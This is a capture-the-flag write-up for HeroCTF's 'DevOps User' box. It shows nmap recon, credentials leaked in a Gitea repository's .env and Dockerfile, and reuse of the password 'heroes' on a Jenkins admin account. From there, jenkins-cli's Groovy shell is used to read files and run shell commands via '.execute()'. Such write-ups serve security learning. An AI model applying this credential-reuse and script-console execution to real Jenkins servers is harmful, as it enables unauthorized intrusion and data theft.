DevOps User
Category: Box
300 points
Can you find the user.txt flag on the box ?
URL : http://box.heroctf.fr (only dockers are on the scope, not the real machine behind)
The machine resets itself every hour, so keep track of your work !
Format : Hero{}
Author : xanhacks
nmap.txt
$ nmap -p 3000,8080,2222 box.heroctf.fr -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 22:30 CEST
Nmap scan report for box.heroctf.fr (35.246.63.133)
Host is up (0.019s latency).
rDNS record for 35.246.63.133: 133.63.246.35.bc.googleusercontent.com
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 8.1 (protocol 2.0)
3000/tcp open ppp?
8080/tcp open http Jetty 9.2.z-SNAPSHOT
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.06 seconds
Solution
I really enjoyed this challenge. Started from recon.
On 8080/tcp
I found hosted Jenkins
.
On 3000/tcp
was Gitea
.
In heroes/Infra
repository I found infrastructure Dockerfiles
, together with docker-compose.yml
and .env
.
.env
MYSQL_ROOT_PASSWORD=P3WaHFLYesa8BNVGyuAL
MYSQL_PASSWORD=P3WaHFLYesa8BNVGyuAL
Dockerfile.gitea
FROM gitea/gitea:1.12.4
COPY ./files/root.txt /root/root.txt
RUN chown root:root /root/root.txt
RUN chmod 400 /root/root.txt
RUN apk add gcc git libffi-dev musl-dev openssl-dev perl py-pip python python-dev sshpass
RUN python -m pip install git+git://github.com/ansible/ansible.git@devel
RUN apk add sudo
RUN echo "git:heroes" | chpasswd
RUN echo "git ALL=(ALL) NOPASSWD:/usr/bin/ansible-playbook" >> /etc/sudoers
Dockerfile.jenkins
FROM jenkins:2.60.3
USER root
COPY ./files/user.txt /var/jenkins_home/user.txt
RUN chown root:root /var/jenkins_home/user.txt
RUN chmod 400 /var/jenkins_home/user.txt
USER jenkins
docker-compose.yml
---
version: '3'
services:
jenkins:
build:
context: .
dockerfile: Dockerfile.jenkins
hostname: gentleman
container_name: jenkins
restart: always
ports:
- "8080:8080"
- "50000:50000"
volumes:
- "./jenkins_home/:/var/jenkins_home/:rw"
gitea:
build:
context: .
dockerfile: Dockerfile.gitea
restart: always
hostname: gitea
container_name: gitea
volumes:
- ./data:/data
ports:
- "3000:3000"
- "2222:22"
depends_on:
- db
db:
image: mariadb:10
restart: always
hostname: mariadb
container_name: mariadb
environment:
- MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
- MYSQL_DATABASE=gitea
- MYSQL_USER=gitea
- MYSQL_PASSWORD=${MYSQL_PASSWORD}
volumes:
- ./db/:/var/lib/mysql
I’ve used heroes
password (from Dockerfile.gitea) for login to Jenkins
admin
account.
I don’t have much experience with Jenkins
, but I found the option to log in using kinda command line tool named
jenkins-cli.jar
.
java -jar jenkins-cli.jar -s http://box.heroctf.fr:8080/ groovysh --username admin --password heroes
Groovy Shell (2.4.8, JVM: 1.8.0_171)
Type ':help' or ':h' for help.
-------------------------------------------------------------------------------
groovy:000>
At the beginning I was a bit lost (I’m not Java guy ;-)), that’s why I’ve retrieved the flag as below.
groovy:000> new File ("/var/jenkins_home/user.txt").eachLine { line ->
groovy:001> println line
groovy:002> }
Hero{dc97a2f7da5304d12fe820bd2a6d343d}
===> null
groovy:000>
Later, I’ve realized that you can use shell commands with some trick (example below), which makes it a bit easier.
groovy:000> "cat /var/jenkins_home/user.txt".execute().text
===> Hero{dc97a2f7da5304d12fe820bd2a6d343d}
Much easier ;-)
Flag
Hero{dc97a2f7da5304d12fe820bd2a6d343d}